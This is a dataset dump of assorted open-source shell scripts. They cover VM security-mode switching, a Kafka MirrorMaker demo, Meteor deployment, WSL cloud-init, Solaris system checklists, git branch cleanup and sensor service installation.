| 6,381 | 3.90625 | 4 |
[] |
no_license
|
#!/bin/bash
# Copyright 2013 University of Michigan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
. utils.sh
SCRIPT_DIR=$(cd $(dirname $0); pwd)
. $SCRIPT_DIR/capsules.cfg
# Print command-line usage for this script to stdout.
usage () {
    cat <<EOF
Usage: $0 <Directory for VM> --mode <Security Mode> --policy <Policy File>

(--wdir) Directory: The directory where this VM's data will be held

--mode Boot to Secure Mode: One of 's(ecure)' or 'm(aintenance)', denotes whether the
       guest being started should be booted into maintenance or secure mode

--policy Policy File: The file that contains the policy for restricting this VM.
EOF
}
# --- Option parsing -------------------------------------------------------
# Options may be given as short flags (-d/-m/-p) or long flags (--wdir/--mode/
# --policy); long options are emulated through the getopts "-:" trick below.
REQUIRED_OPTS="VM_DIR SECURE_MODE POLICY"
ALL_OPTS="$REQUIRED_OPTS"
# Sentinel used to detect options the user never supplied.
UNDEFINED=12345capsulesxXxXxundefined54321
UBUNTU_12_04_IMAGE=uncamp2015-demo.img
for var in $ALL_OPTS; do
eval $var=$UNDEFINED
done
# A bare first argument (not starting with "-") is taken as the VM directory.
if [[ $1 && $1 != -* ]]; then
VM_DIR=$1
shift
fi
# Map of long option name -> number of arguments it consumes.
declare -A longoptspec
longoptspec=( [wdir]=1 [mode]=1 [policy]=1 )
optspec=":h-:d:m:p:"
while getopts "$optspec" OPT; do
# getopts reports "-" for a long option; OPTARG then holds "name" or
# "name=value".
if [[ "x${OPT}x" = "x-x" ]]; then
if [[ "${OPTARG}" =~ .*=.* ]]; then
OPT=${OPTARG/=*/}
OPTARG=${OPTARG#*=}
((OPTIND--))
else #with this --key value1 value2 format multiple arguments are possible
OPT="$OPTARG"
OPTARG=(${@:OPTIND:$((longoptspec[$OPT]))})
fi
((OPTIND+=longoptspec[$OPT]))
fi
case "${OPT}" in
d|wdir)
VM_DIR=$OPTARG
;;
m|mode)
RAW_MODE=$OPTARG
# Ensure mode string has proper format
if [ -z $RAW_MODE -o ${RAW_MODE:0:1} != 's' -a ${RAW_MODE:0:1} != 'm' ]; then
usage
exit 1
fi
# SECURE_MODE becomes 0 ("true" in shell terms) when the mode starts
# with 's'; it is the [ ... ] exit status, not a boolean literal.
[ ${RAW_MODE:0:1} = 's' ]
SECURE_MODE=$?
if [ $SECURE_MODE = 0 ]; then
REQUIRED_OPTS="$REQUIRED_OPTS POLICY"
fi
;;
p|policy)
POLICY=$OPTARG
;;
h|help)
usage;
exit 1
;;
*)
echo "error: Invalid argument '--${OPT}'"
usage
exit 1
;;
esac
done
# Any required option still holding the sentinel was never provided.
MISSING_ARGS=0
for var in $REQUIRED_OPTS; do
if [[ ${!var} = $UNDEFINED ]]; then
echo "error: $var not set"
MISSING_ARGS=1
fi
done
if [[ $MISSING_ARGS -eq 1 ]]; then
usage
exit 1
fi
if [ ! -d $VM_DIR ] ; then
echo "Error: Invalid VM directory specified!"
exit 2
fi
# Load config file
. $VM_DIR/config
# Check if VM is already in the mode we're switching to
if [[ `cat $VM_DIR/mode` = "Maintenance" && $SECURE_MODE -ne 0 || `cat $VM_DIR/mode` = "Secure" && $SECURE_MODE -eq 0 ]]; then
echo "Error: VM is already in that mode"
exit 3
fi
# --- Mode switch ----------------------------------------------------------
# Commands are sent to the QEMU monitor over the VM's unix socket with nc -U;
# the order of operations below (sync, firewall, snapshot, attach) matters.
# If secure mode, sync storage, apply policy, take snapshot, mount secure volume, update modefile
if [ $SECURE_MODE = 0 ]; then
# Wait for secure volume to finish being created (in case it hasn't yet by createvm)
for time in $(seq 1 30); do
if [ -e $VM_DIR/$SECURE_VOL ]; then
break
fi
sleep 1
done
if [ ! -e $VM_DIR/$SECURE_VOL ]; then
echo "Error: CreateVM failed to create secure volume; unable to enter secure mode!"
exit 5
fi
# Sync storage
echo "commit all" | nc -U $VM_DIR/monitor >/dev/null
# Apply Firewall Policy
sudo $SCRIPT_DIR/fw.sh $VM_DIR $POLICY
FW_RES=$?
if [ $FW_RES -ne 0 ]; then
echo "Error: Failed to apply firewall policy; error code ($FW_RES)"
exit 6
fi
# Take Capsules Snapshot
echo "savevm capsules" | nc -U $VM_DIR/monitor >/dev/null
# Mount Secure Volume
echo "drive_add 0 if=none,id=secure_volume,file=$VM_DIR/$SECURE_VOL" | nc -U $VM_DIR/monitor >/dev/null
# Old Ubuntu 12.04 images (and guests without the negotiator agent) only
# support USB attach; newer guests get the faster virtio-blk device.
if beginswith $UBUNTU_12_04_IMAGE $IMAGE || [ -z ${NEGOTIATOR_ENABLED+x} ] || [ $NEGOTIATOR_ENABLED -eq 0 ]; then
echo "device_add usb-storage,id=secure_volume,drive=secure_volume" | nc -U $VM_DIR/monitor >/dev/null
else
echo "device_add virtio-blk-pci,id=secure_volume,drive=secure_volume" | nc -U $VM_DIR/monitor >/dev/null
fi
#
# Mount Spool Volume
echo "drive_add 1 id=spool,if=none,file=$VM_DIR/spool_volume" | nc -U $VM_DIR/monitor >/dev/null
if beginswith $UBUNTU_12_04_IMAGE $IMAGE || [ -z ${NEGOTIATOR_ENABLED+x} ] || [ $NEGOTIATOR_ENABLED -eq 0 ]; then
echo "device_add usb-storage,id=spool,drive=spool" | nc -U $VM_DIR/monitor >/dev/null
else
echo "device_add virtio-blk-pci,id=spool,drive=spool" | nc -U $VM_DIR/monitor >/dev/null
fi
if ! beginswith $UBUNTU_12_04_IMAGE $IMAGE && [ -n "$NEGOTIATOR_ENABLED" ] && [ $NEGOTIATOR_ENABLED -eq 1 ]; then
# Automount volumes and fix permissions
sleep 5
echo "Automounting disks and fixing permissions"
python $SCRIPT_DIR/tools/negotiator-cli/negotiator-cli.py -e fix-securevol-permissions $VM_DIR/negotiator-host-to-guest.sock
fi
# Start release daemon if not already running
if [ ! -e $VM_DIR/release_pid ]; then
nohup $SCRIPT_DIR/released.sh $VM_DIR 2>>$VM_DIR/release_log >>$VM_DIR/release_log &
echo "$!" > $VM_DIR/release_pid
fi
# Update Mode File
echo "Secure" > $VM_DIR/mode
# If maintenance, unmount secure volume, revert snapshot, remove policy, update modefile
else
# Unmount Secure Volume and Spool Volume
echo "device_del secure_volume" | nc -U $VM_DIR/monitor >/dev/null
echo "drive_del secure_volume" | nc -U $VM_DIR/monitor >/dev/null
echo "device_del spool" | nc -U $VM_DIR/monitor >/dev/null
echo "drive_del spool" | nc -U $VM_DIR/monitor >/dev/null
# Revert Capsules Snapshot
echo "loadvm capsules" | nc -U $VM_DIR/monitor >/dev/null
# Replace Firewall Policy
sudo $SCRIPT_DIR/fw.sh $VM_DIR $POLICY
FW_RES=$?
if [ $FW_RES -ne 0 ]; then
echo "Error: Failed to replace firewall policy; error code ($FW_RES)"
exit 7
fi
# The devices have been removed already,
# this just resets things for future secure transitions
echo "usb_del 0.0" | nc -U $VM_DIR/monitor >/dev/null
# Update Mode File
echo "Maintenance" > $VM_DIR/mode
fi
exit 0
| true |
fe3e0298ccb37e68ecafb777ff8c7a24c4759d49
|
Shell
|
vdesabou/kafka-docker-playground
|
/multi-data-center/mirrormaker2/mirrormaker2-plaintext.sh
|
UTF-8
| 1,980 | 3.484375 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Demo: replicate topics between a US and a Europe Kafka cluster with
# MirrorMaker 2 over PLAINTEXT. Requires the mdc-plaintext docker environment
# and CP >= 5.4 (first release shipping MM2).
set -e
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )"
source ${DIR}/../../scripts/utils.sh
if ! version_gt $TAG_BASE "5.3.99"; then
logwarn "WARN: This example is working starting from CP 5.4 only"
exit 111
fi
${DIR}/../../environment/mdc-plaintext/start.sh "${PWD}/docker-compose.mdc-plaintext.yml"
log "Sending sales in Europe cluster"
seq -f "european_sale_%g ${RANDOM}" 10 | docker container exec -i broker-europe kafka-console-producer --broker-list localhost:9092 --topic sales_EUROPE
log "Sending sales in US cluster"
seq -f "us_sale_%g ${RANDOM}" 10 | docker container exec -i broker-us kafka-console-producer --broker-list localhost:9092 --topic sales_US
log "Consolidating all sales (logs are in /tmp/mirrormaker.log):"
# run in detach mode -d
docker exec -d connect-us bash -c '/usr/bin/connect-mirror-maker /etc/kafka/connect-mirror-maker.properties > /tmp/mirrormaker.log 2>&1'
# docker exec connect-us bash -c '/usr/bin/connect-mirror-maker /etc/kafka/connect-mirror-maker.properties'
# Give MM2 time to start and replicate both topics before verifying.
log "sleeping 120 seconds"
sleep 120
# Topic Renaming
# By default MM2 renames source topics to be prefixed with the source cluster name. e.g. if topic foo came from cluster A then it would be named A.foo on the destination. In the current release (5.4) MM2 does not support any different topic naming strategies out of the box.
log "Verify we have received the data in topic US.sales_US in EUROPE"
timeout 60 docker container exec broker-europe kafka-console-consumer --bootstrap-server localhost:9092 --topic "US.sales_US" --from-beginning --max-messages 10
log "Verify we have received the data in topic EUROPE.sales_EUROPE topics in the US"
timeout 60 docker container exec broker-us kafka-console-consumer --bootstrap-server localhost:9092 --topic "EUROPE.sales_EUROPE" --from-beginning --max-messages 10
log "Copying mirrormaker logs to /tmp/mirrormaker.log"
docker cp connect-us:/tmp/mirrormaker.log /tmp/mirrormaker.log
| true |
25df4af3fd0bd029ecdcb7e5eb887afc931807d5
|
Shell
|
tvararu/react-motion-unmounting-demo
|
/scripts/deploy.sh
|
UTF-8
| 528 | 2.90625 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build the React production bundle, move the static assets into the Meteor
# app, and deploy. Extra arguments are forwarded to `meteor deploy`.
ROOT_FOLDER=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/..
cd $ROOT_FOLDER
npm install
# Start from a clean generated-build directory.
rm -Rf meteor/react-build-generated
./node_modules/.bin/webpack --config webpack/production.config.js -p
# Client assets (everything except main.js) become Meteor public assets;
# the equivalent server artifacts are discarded.
find meteor/react-build-generated/client -maxdepth 1 -mindepth 1 -not -name main.js \
  -exec mv '{}' meteor/public/assets \;
find meteor/react-build-generated/server -maxdepth 1 -mindepth 1 -not -name main.js \
  -exec rm -f '{}' \;
cd meteor
meteor deploy --settings $ROOT_FOLDER/settings/production.json $@
| true |
93bcbee8b3a13913a8e32a1d8db8960792c35375
|
Shell
|
cmbntr/wsl-cloud-init
|
/wsl-cloud-init.sh
|
UTF-8
| 1,040 | 3.546875 | 4 |
[] |
no_license
|
#!/bin/bash
# Re-run cloud-init inside WSL using the NoCloud datasource.
# Usage: wsl-cloud-init.sh [--noclean] [seedfrom-url]
if [ "$1" = "--noclean" ]; then
shift 1
CLEAN="0"
else
echo "clean existing cloud-init config"
CLEAN="1"
cloud-init clean --logs --seed
fi
# An optional first argument is a NoCloud seed URL; otherwise fall back to
# the kernel command line.
if [ -n "$1" ]; then
DEBUG_PROC_CMDLINE="ds=nocloud;seedfrom=$1"
shift 1
# seedfrom must end with a trailing slash; append one if missing.
case "$DEBUG_PROC_CMDLINE" in
*/)
# Slash at end, ok!
;;
*)
# Add slash
DEBUG_PROC_CMDLINE="$DEBUG_PROC_CMDLINE/"
;;
esac
else
DEBUG_PROC_CMDLINE="$(cat /proc/cmdline)" # by default cloud-init uses /proc/1/cmdline in a 'container'
fi
set -o pipefail
set -eu
exec 2>&1
# Locate ds-identify; the path differs across distro packagings.
DSIDENTIFY="/usr/lib/cloud-init/ds-identify"
if [ ! -x $DSIDENTIFY ]; then
DSIDENTIFY="$(find /usr -path '*/cloud-init/ds-identify' | head -n 1)"
fi
export DEBUG_PROC_CMDLINE
DEBUG_LEVEL="$CLEAN" DI_LOG=stderr $DSIDENTIFY --force
cloud-init --version
# Run the full cloud-init stage sequence manually.
cloud-init init --local
cloud-init init
cloud-init modules --mode=config
cloud-init modules --mode=final
cloud-init analyze show
cloud-id -j
# Sanity check: the detected datasource must be NoCloud.
if [ "nocloud" != "$(cloud-id | tr -d '\n')" ]; then
echo "cloud-id should be nocloud!"
exit 1
fi
| true |
584137898df111a19a2b06d14de0c9e575cbdbae
|
Shell
|
kairoaraujo/checklist-unix
|
/modules/mod_SunOS.sh
|
UTF-8
| 4,209 | 3.046875 | 3 |
[] |
no_license
|
#!/bin/sh
#
# checklist-unix
#
# Kairo Araujo (c) 2010-2016
#
##############################################################################
#
# mkcheck()
#
# 1. Create the command
#
# file_name {FILE_NAME}
# {COMMAND} > $CHKU_GFILE
#
# Rules for {FILE_NAME}
#
# a. low case
#
# b. do not use special characters, only _ is permitted.
#
# c. be clear
#
# Rules for {COMMAND}
#
# a. the final output needs to be send to variable $CHKU_GFILE
#
# Example 1:
#
# file_name netstat_anv
# netstat -anv > $CHKU_GFILE
#
# Example 2: (with conditional)
#
# if [ -f /usr/sbin/prtconf ]
# then
# file_name prtconf
# /usr/sbin/prtconf >$CHKU_GFILE
# fi
#
###############################################################################
#
#
# Collect a Solaris (SunOS) system checklist: each file_name/command pair
# writes one command's output to the file handle provided by the framework
# via $CHKU_GFILE. Includes Veritas Volume Manager and Veritas Cluster
# sections when those tools are installed.
mkcheck ()
{
file_name hostname_do_servidor
hostname >$CHKU_GFILE
file_name versionamento_do_servidor
uname -a >$CHKU_GFILE
file_name analise_do_mirror
metastat >$CHKU_GFILE
file_name status_do_mirror
metastat -c >$CHKU_GFILE
file_name release_do_servidor
cat /etc/release >$CHKU_GFILE
file_name filesystems_montados
df -h | awk '{ print $1" \t"$2" \t"$6 }' >$CHKU_GFILE
file_name status_do_veritas_volume_manager
vxdisk -o alldgs list | grep -v \( >$CHKU_GFILE
file_name rotas_de_rede
netstat -rnv | cut -c 1-65 >$CHKU_GFILE
file_name configuracao_de_rede
ifconfig -a >$CHKU_GFILE
file_name arquivo_vfstab
cat /etc/vfstab|sort >$CHKU_GFILE
file_name dispositivos_de_io
iostat -En >$CHKU_GFILE
file_name configuracao_de_hardware_prtdiag
prtdiag >$CHKU_GFILE
file_name configuracao_de_hardware_prtconf
prtconf >$CHKU_GFILE
file_name interfaces_hba
fcinfo hba-port >$CHKU_GFILE
file_name dispositivos_ethernet
dladm show-dev >$CHKU_GFILE
file_name status_dos_servicos
svcs | awk '{ print $1" "$3 }' >$CHKU_GFILE
file_name compartilhamentos_share
share | awk '{ print $1" "$3 }' >$CHKU_GFILE
file_name compartilhamentos_showmount
showmount | awk '{ print $1" "$3 }' >$CHKU_GFILE
echo ""
file_name modulos_do_sistema
modinfo | awk '{print $6,$7,$8,$9,$10,$11,$12}' >$CHKU_GFILE
#####################################################################
## Module added for checking Veritas Volume Manager!!! #
## Module added for checking Veritas Cluster!!!! #
#####################################################################
# Make the Veritas tool directories reachable for the checks below.
PATH=${PATH}:/usr/lib/vxvm/diag.d:/etc/vx/diag.d:/opt/VRTS/bin:/opt/VRTSvlic/bin
export PATH
# Veritas Volume Manager checks (only when vxdg is installed).
if [ -f /opt/VRTS/bin/vxdg ]
then
file_name status_dos_discos_veritas
vxdisk list >$CHKU_GFILE
file_name serial_dos_discos
vxdisk -e list >$CHKU_GFILE
file_name disk_groups
vxdg list >$CHKU_GFILE
file_name status_volumes
vxprint -ht >$CHKU_GFILE
file_name status_controladoras
vxdmpadm listctlr all >$CHKU_GFILE
file_name status_controladoras_storage
vxdmpadm listenclosure all >$CHKU_GFILE
file_name storages_suportados
vxddladm listsupport >$CHKU_GFILE
file_name status_daemon_vxdctl
vxdctl mode >$CHKU_GFILE
file_name status_cluster_enable
vxdctl -c mode
file_name checa_licencas_veritas
vxlicrep >$CHKU_GFILE
file_name checa_licencas_ativadas
vxlicrep -e >$CHKU_GFILE
file_name status_multipath_veritas
vxdmpadm stat restored >$CHKU_GFILE
fi
# Veritas Cluster Server checks (only when hastatus is installed).
if [ -f /opt/VRTSvcs/bin/hastatus ]
then
file_name status_cluster
hastatus -summary >$CHKU_GFILE
file_name status_servicos_cluster
hares -display >$CHKU_GFILE
file_name configuracoes_cluster
hagrp -display >$CHKU_GFILE
file_name nodes_do_cluster
hasys -list >$CHKU_GFILE
file_name status_nodes_cluster
hasys -state >$CHKU_GFILE
file_name nodeid_do_host
hasys -nodeid >$CHKU_GFILE
file_name status_do_llstat
llstat >$CHKU_GFILE
file_name status_do_gab
gabconfig -a >$CHKU_GFILE
fi
}
| true |
2efca1c39b9c32c322617ca827ce96b716f5ecd7
|
Shell
|
josephtyler/home
|
/bin/git-cleanup.sh
|
UTF-8
| 725 | 3.65625 | 4 |
[] |
no_license
|
#!/bin/bash
# Delete local branches already merged into the current branch (keeping
# master/develop). With -r, also delete merged remote branches on origin.
# With -u, list the branches that are still unmerged.
set -e
REMOTE=0
SHOW_UNMERGED=0
while getopts ru option; do
  case "${option}" in
    r) REMOTE=1 ;;
    u) SHOW_UNMERGED=1 ;;
  esac
done
# Always run this from master
# git checkout -q master
# Fetch and prune
git fetch --prune
# Delete local merged branches
git branch --merged | grep -v '\*\|master\|develop' | xargs -n 1 git branch -d
# Delete remote merged branches
if [[ $REMOTE -eq 1 ]]; then
  git branch -r --merged | perl -ne 'print "$1\n" if /origin\/(.*)/ and !/HEAD/ and !/master/' | xargs -n 1 git push origin --delete
fi
if [[ $SHOW_UNMERGED -eq 1 ]]; then
  echo "Unmerged local branches:"
  echo
  git branch --no-merged
  if [[ $REMOTE -eq 1 ]]; then
    # Fix: this branch previously had an empty body ("then" directly followed
    # by "fi"), which is a bash syntax error that aborted the whole script.
    # NOTE(review): listing remote unmerged branches appears to be the intent
    # here, mirroring the local listing above — confirm with the author.
    echo
    echo "Unmerged remote branches:"
    git branch -r --no-merged
  fi
fi
| true |
65ae1bf8b4380247fb95176e09841e9cd436e696
|
Shell
|
StartupAndPlay/startupandplay.com
|
/bin/clone.sh
|
UTF-8
| 407 | 3.703125 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Interactively create an environment marker file (env_local or env_staging)
# in the repository root, one directory above this script.
cd `dirname $0`/..
set -e
read -p "Local environment? (y/n) " -n 1
case "$REPLY" in
  [Yy])
    touch env_local
    echo -e "\nCreated environment file successfully"
    ;;
  *)
    read -p "Staging environment? (y/n) " -n 1
    case "$REPLY" in
      [Yy])
        touch env_staging
        echo -e "\nCreated environment file successfully"
        ;;
      *)
        echo -e "\nNo environment file was created."
        ;;
    esac
    ;;
esac
| true |
fab4aaec60c117c5188f22e8e9c612fb3fde6557
|
Shell
|
DataDog/dd-trace-dotnet
|
/profiler/build/run.sh
|
UTF-8
| 131 | 3.1875 | 3 |
[
"Apache-2.0",
"MIT"
] |
permissive
|
#!/bin/bash
# Feed the <scenario>.linux.<variant>.json results file ($1, $2) to timeit,
# if it exists.
FILE="$1.linux.$2.json"
if [ ! -f "$FILE" ]; then
    echo "$FILE does not exist."
else
    ${GOPATH}/bin/timeit "$FILE"
fi
| true |
9502e3a3d89385e98359f35e99c53d86ab079e8f
|
Shell
|
sai-raavi/MyS3backup
|
/config/ecs-optimized/health-webserver.sh
|
UTF-8
| 396 | 2.9375 | 3 |
[] |
no_license
|
#!/bin/bash
# init-style wrapper for the health web server: start | stop.
# The server's PID is tracked in /var/run/health-webserver.pid.

# Kill the previously recorded server process, if a pid file exists.
kill_recorded() {
    test -e /var/run/health-webserver.pid && kill "$(cat /var/run/health-webserver.pid)"
}

case $1 in
start)
    kill_recorded
    # Replace any stale instance, piping server output to syslog.
    exec /usr/local/bin/health-webserver.py 2>&1 | /usr/bin/logger -t health-webserver & ;;
stop)
    kill_recorded ;;
*)
    echo "usage: health-webserver {start|stop}" ;;
esac
exit 0
| true |
a22bded569f6f835455aa2052c69b5334c603a06
|
Shell
|
JKirchartz/dotfiles
|
/scripts/trellis_up.sh
|
UTF-8
| 361 | 2.828125 | 3 |
[] |
no_license
|
#! /bin/sh
#
# trellis_up.sh <path/to/trellis/project>
# Copyright (C) 2017 jkirchartz <me@jkirchartz.com>
#
# Distributed under terms of the NPL (Necessary Public License) license.
#
# Boot the Trellis Vagrant VM, then build/watch the theme with gulp —
# in a tmux split when run inside tmux, inline otherwise.
cd "$1/trellis" || exit 1;
vagrant up
cd "../theme" || exit 1;
if [ -n "$TMUX" ]; then
# NOTE(review): the trailing 'C-m' argument looks like a send-keys keystroke
# pasted onto split-window; tmux split-window does not take key arguments —
# confirm whether it was meant to be dropped.
tmux split-window -v -p 90 "gulp && gulp watch" 'C-m'
else
gulp && gulp watch
fi
| true |
c14dec8111030f62e8ba07868ec176597c4f5c3c
|
Shell
|
vegito11/Day-Today
|
/Bash/Programms/Strings/get_user_info.sh
|
UTF-8
| 227 | 2.65625 | 3 |
[] |
no_license
|
#!/bin/sh
# Prompt for a username and print its /etc/passwd fields.
# printf replaces the original `echo '...\c'`, whose \c escape is not
# interpreted by bash's echo (it printed a literal backslash-c).
printf 'Enter Username :'
read -r username
# Anchor on the login field so e.g. "bob" does not match "bobby" or a GECOS
# substring; quote the variable to prevent globbing/word-splitting.
line=$(grep "^${username}:" /etc/passwd)
# Split the passwd entry on ":" into the positional parameters; "--" keeps a
# leading "-" in $line from being parsed as an option to set.
IFS=:
set -- $line
echo "Username : $1"
echo "User ID : $2"
echo "Group ID : $3"
echo "Comment Field : $4"
echo "Home Folder : $5"
echo "Default Shell : $6"
| true |
538e083e059ee8cac851a41ea410ea911e0373f7
|
Shell
|
carlj/IoT-Hackathon
|
/helper/services/install-services.sh
|
UTF-8
| 1,210 | 2.609375 | 3 |
[] |
no_license
|
#!/bin/bash
# Install the sensor systemd units (reader + MQTT publisher pairs) into
# /etc/systemd/system. Enabling the units is left commented out on purpose.
cd "$(dirname "$0")"
# Install DHT22 Service
sudo cp dht22.service /etc/systemd/system/dht22.service
sudo cp dht22-mqtt.service /etc/systemd/system/dht22-mqtt.service
#sudo systemctl enable dht22.service
#sudo systemctl enable dht22-mqtt.service
# Install L3GD20 Service
sudo cp l3gd20.service /etc/systemd/system/l3gd20.service
sudo cp l3gd20-mqtt.service /etc/systemd/system/l3gd20-mqtt.service
#sudo systemctl enable l3gd20.service
#sudo systemctl enable l3gd20-mqtt.service
# Install LSM303 Service
sudo cp lsm303.service /etc/systemd/system/lsm303.service
# Fix: previously copied lsm303.service over the -mqtt unit (copy-paste bug);
# every other sensor installs its dedicated -mqtt unit file.
sudo cp lsm303-mqtt.service /etc/systemd/system/lsm303-mqtt.service
#sudo systemctl enable lsm303.service
#sudo systemctl enable lsm303-mqtt.service
# Install MTK3339 Service
sudo cp mtk3339.service /etc/systemd/system/mtk3339.service
sudo cp mtk3339-mqtt.service /etc/systemd/system/mtk3339-mqtt.service
#sudo systemctl enable mtk3339.service
#sudo systemctl enable mtk3339-mqtt.service
# Install TSL2591 Service
sudo cp tsl2591.service /etc/systemd/system/tsl2591.service
sudo cp tsl2591-mqtt.service /etc/systemd/system/tsl2591-mqtt.service
#sudo systemctl enable tsl2591.service
#sudo systemctl enable tsl2591-mqtt.service
| true |
e5f6c29a3cf1c27555f584beed2800d60457df7b
|
Shell
|
qmutz/nnn
|
/plugins/bookmarks
|
UTF-8
| 1,648 | 4.125 | 4 |
[
"BSD-2-Clause"
] |
permissive
|
#!/usr/bin/env sh
# Description: Use named bookmarks using symlinks
#
# Dependencies: fzf
#
# Usage:
# 1. Create a $BOOKMARKS_DIR directory
# By default, $BOOKMARKS_DIR is set to: ${XDG_CACHE_HOME:-$HOME/.cache}/nnn/bookmarks
#
# 2. Create symlinks to directories
# `cd $BOOKMARKS_DIR`
# `ln -s /path/to/useful/directory bookmark_name`
# `ln -s $XDG_CONFIG_HOME/nnn/plugins nnn_plugins"
# `ln -s /path/to/documents docs`
# `ln -s /path/to/media media`
# `ln -s /path/to/movies movies`
#
# Bonus tip: Add `$BOOKMARKS_DIR` to your `$CDPATH`
# https://linux.101hacks.com/cd-command/cdpath/
#
# TODO:
# 1. Remove `fzf` dependency
#
# Shell: POSIX compliant
# Author: Todd Yamakawa
# Default the bookmark directory when the user has not set one.
if [ -z "$BOOKMARKS_DIR" ]; then
    BOOKMARKS_DIR="${XDG_CACHE_HOME:-$HOME/.cache}/nnn/bookmarks"
fi
# Check if NNN_PIPE is set
# (nnn exports NNN_PIPE for plugins; without it we cannot change directory).
if [ -z "$NNN_PIPE" ]; then
    echo 'ERROR: NNN_PIPE is not set' | ${PAGER:-less}
    exit 2
fi
# Get all directory symlinks
# Presents "name -> target" pairs in fzf and prints the selected bookmark
# path; prints $PWD when the selection is empty (fzf cancelled).
get_links() {
    for entry in "$1"/*; do
        # Skip unless directory symlink
        [ -h "$entry" ] || continue
        [ -d "$entry" ] || continue
        printf "%20s -> %s\n" "$(basename "$entry")" "$(readlink -f "$entry")"
    done | fzf |
        awk 'END {
            if (length($1) == 0) { print "'"$PWD"'" }
            else { print "'"$BOOKMARKS_DIR"'/"$1 }
        }'
}
# Choose symlink with fzf
cddir="$(get_links "$BOOKMARKS_DIR")"
# Writing result to NNN_PIPE will change nnn's active directory
# https://github.com/jarun/nnn/tree/master/plugins#send-data-to-nnn
context=0
printf "%s" "${context}c$(readlink -f "$cddir")" > "$NNN_PIPE"
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.